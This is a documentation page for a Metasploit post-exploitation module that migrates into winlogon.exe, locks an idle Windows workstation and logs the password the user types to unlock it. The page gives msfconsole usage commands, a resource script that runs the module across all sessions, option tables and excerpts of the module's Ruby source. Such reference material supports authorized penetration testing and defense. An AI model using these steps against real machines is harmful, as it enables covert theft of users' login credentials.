Windows Capture Winlogon Lockout Credential Keylogger - Metasploit


This page contains detailed information about how to use the post/windows/capture/lockout_keylogger metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Windows Capture Winlogon Lockout Credential Keylogger
Module: post/windows/capture/lockout_keylogger
Source code: modules/post/windows/capture/lockout_keylogger.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module migrates and logs Microsoft Windows user's passwords via Winlogon.exe using idle time and natural system changes to give a false sense of security to the user.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/capture/lockout_keylogger

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/capture/lockout_keylogger
msf post(lockout_keylogger) > show options
    ... show and set options ...
msf post(lockout_keylogger) > set SESSION session-id
msf post(lockout_keylogger) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/capture/lockout_keylogger")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage

Here is how the windows/capture/lockout_keylogger post exploitation module looks in the msfconsole:

msf6 > use post/windows/capture/lockout_keylogger

msf6 post(windows/capture/lockout_keylogger) > show info

       Name: Windows Capture Winlogon Lockout Credential Keylogger
     Module: post/windows/capture/lockout_keylogger
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  mubix <[email protected]>
  cg

Compatible session types:
  Meterpreter

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  HEARTBEAT  30               yes       Heart beat between idle checks
  INTERVAL   30               yes       Time between key collection during logging
  LOCKTIME   300              yes       Amount of idle time before lockout
  PID                         no        Target PID, only needed if multiple winlogon.exe instances exist
  SESSION                     yes       The session to run this module on.
  WAIT       false            yes       Wait for lockout instead of default method

Description:
  This module migrates and logs Microsoft Windows user's passwords via 
  Winlogon.exe using idle time and natural system changes to give a 
  false sense of security to the user.

References:
  http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html

Module Options

This is a complete list of options available in the windows/capture/lockout_keylogger post exploitation module:

msf6 post(windows/capture/lockout_keylogger) > show options

Module options (post/windows/capture/lockout_keylogger):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HEARTBEAT  30               yes       Heart beat between idle checks
   INTERVAL   30               yes       Time between key collection during logging
   LOCKTIME   300              yes       Amount of idle time before lockout
   PID                         no        Target PID, only needed if multiple winlogon.exe instances exist
   SESSION                     yes       The session to run this module on.
   WAIT       false            yes       Wait for lockout instead of default method

Advanced Options

Here is a complete list of advanced options supported by the windows/capture/lockout_keylogger post exploitation module:

msf6 post(windows/capture/lockout_keylogger) > show advanced

Module advanced options (post/windows/capture/lockout_keylogger):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the windows/capture/lockout_keylogger module can do:

msf6 post(windows/capture/lockout_keylogger) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the windows/capture/lockout_keylogger post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/capture/lockout_keylogger) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Winlogon not found! Exiting

Here is a relevant code snippet related to the "Winlogon not found! Exiting" error message:

46:	      if x['name'].downcase == "winlogon.exe"
47:	        winlogon << x
48:	      end
49:	    end
50:	    if winlogon.size == 0
51:	      print_status("Winlogon not found! Exiting")
52:	      return 'exit'
53:	    elsif winlogon.size == 1
54:	      return winlogon[0]['pid']
55:	    else
56:	      print_error("Multiple WINLOGON processes found, run manually and specify pid")

Multiple WINLOGON processes found, run manually and specify pid

Here is a relevant code snippet related to the "Multiple WINLOGON processes found, run manually and specify pid" error message:

51:	      print_status("Winlogon not found! Exiting")
52:	      return 'exit'
53:	    elsif winlogon.size == 1
54:	      return winlogon[0]['pid']
55:	    else
56:	      print_error("Multiple WINLOGON processes found, run manually and specify pid")
57:	      print_error("Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session")
58:	      winlogon.each do |tp|
59:	        print_status("Winlogon.exe - PID: #{tp['pid']} - Session: #{tp['session']}")
60:	      end
61:	      return 'exit'

Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session

Here is a relevant code snippet related to the "Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session" error message:

52:	      return 'exit'
53:	    elsif winlogon.size == 1
54:	      return winlogon[0]['pid']
55:	    else
56:	      print_error("Multiple WINLOGON processes found, run manually and specify pid")
57:	      print_error("Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session")
58:	      winlogon.each do |tp|
59:	        print_status("Winlogon.exe - PID: #{tp['pid']} - Session: #{tp['session']}")
60:	      end
61:	      return 'exit'
62:	    end

Failed to start Keylogging!

Here is a relevant code snippet related to the "Failed to start Keylogging!" error message:

67:	    begin
68:	      print_status("Starting the keystroke sniffer...")
69:	      session.ui.keyscan_start
70:	      return true
71:	    rescue
72:	      print_error("Failed to start Keylogging!")
73:	      return false
74:	    end
75:	  end
76:	
77:	  # Function for Collecting Capture (pulled from Carlos Perez's Keylogrecorder)

This module does not support this platform.

Here is a relevant code snippet related to the "This module does not support this platform." error message:

151:	    ::FileUtils.mkdir_p(logs)	# Create the log directory
152:	    logfile = logs + ::File::Separator + host + filenameinfo + ".txt"	# Logfile name
153:	
154:	    # Make sure we are on a Windows host
155:	    if client.platform != 'windows'
156:	      print_error('This module does not support this platform.')
157:	      return
158:	    end
159:	
160:	    # Check admin status
161:	    admin = check_admin

Must be an admin to migrate into Winlogon.exe, exiting

Here is a relevant code snippet related to the "Must be an admin to migrate into Winlogon.exe, exiting" error message:

158:	    end
159:	
160:	    # Check admin status
161:	    admin = check_admin
162:	    if admin == false
163:	      print_error("Must be an admin to migrate into Winlogon.exe, exiting")
164:	      return
165:	    end
166:	
167:	    mypid = session.sys.process.getpid
168:	    if datastore['PID'] == 0

Already in WINLOGON no need to migrate

Here is a relevant code snippet related to the "Already in WINLOGON no need to migrate" error message:

176:	      targetpid = datastore['PID']
177:	      print_status("WINLOGON PID:#{targetpid} specified. I'm trusting you...")
178:	    end
179:	
180:	    if mypid == targetpid
181:	      print_status("Already in WINLOGON no need to migrate")
182:	    else
183:	      print_status("Migrating from PID:#{mypid}")
184:	      begin
185:	        session.core.migrate(targetpid)
186:	      rescue

Unable to migrate, try getsystem first

Here is a relevant code snippet related to the "Unable to migrate, try getsystem first" error message:

182:	    else
183:	      print_status("Migrating from PID:#{mypid}")
184:	      begin
185:	        session.core.migrate(targetpid)
186:	      rescue
187:	        print_error("Unable to migrate, try getsystem first")
188:	        return
189:	      end
190:	      print_good("Migrated to WINLOGON PID: #{targetpid} successfully")
191:	    end
192:

Locking the workstation falied, trying again..

Here is a relevant code snippet related to the "Locking the workstation falied, trying again.." error message:

222:	        select(nil, nil, nil, datastore['HEARTBEAT'])
223:	        currentidle = session.ui.idle_time
224:	      end
225:	      client.railgun.user32.LockWorkStation()
226:	      if client.railgun.user32.GetForegroundWindow()['return'] == 0
227:	        print_error("Locking the workstation falied, trying again..")
228:	        client.railgun.user32.LockWorkStation()
229:	        if client.railgun.user32.GetForegroundWindow()['return'] == 0
230:	          print_error("The system will not lock this session, nor will it be used for user login, exiting...")
231:	          return
232:	        else

The system will not lock this session, nor will it be used for user login, exiting...

Here is a relevant code snippet related to the "The system will not lock this session, nor will it be used for user login, exiting..." error message:

225:	      client.railgun.user32.LockWorkStation()
226:	      if client.railgun.user32.GetForegroundWindow()['return'] == 0
227:	        print_error("Locking the workstation falied, trying again..")
228:	        client.railgun.user32.LockWorkStation()
229:	        if client.railgun.user32.GetForegroundWindow()['return'] == 0
230:	          print_error("The system will not lock this session, nor will it be used for user login, exiting...")
231:	          return
232:	        else
233:	          print_status("Locked this time, time to start keyloggin...")
234:	        end
235:	      end

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • mubix
  • cg

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.